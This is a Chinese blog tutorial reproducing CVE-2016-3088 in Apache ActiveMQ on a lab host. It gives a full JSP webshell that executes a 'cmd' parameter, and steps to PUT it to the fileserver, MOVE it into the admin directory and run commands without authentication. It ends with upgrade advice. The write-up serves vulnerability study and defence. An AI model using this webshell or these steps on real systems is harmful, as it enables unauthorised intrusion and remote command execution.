Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

发布时间:2020-09-18 02:56:38 作者:雨中落叶
来源:脚本之家 阅读:1200

一、漏洞描述

该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。

二、漏洞影响版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞环境搭建

1、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.html

2、解压

3、启动,进入bin目录下,运行./activemq start

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

四、漏洞复现

1、PUT上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件

Jsp文件内容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

4、利用Move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

参考: https://www.secpulse.com/archives/60064.html

总结

以上所述是小编给大家介绍的Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对亿速云网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

推荐阅读:
  1. Apache ActiveMQ 远程代码执行漏洞 (CVE-
  2. Apache SSI 远程命令执行漏洞

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

apache activemq 漏洞

上一篇:docker利用WebHook实现持续集成

下一篇:windows7下mysql8.0.18部署安装教程图解

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》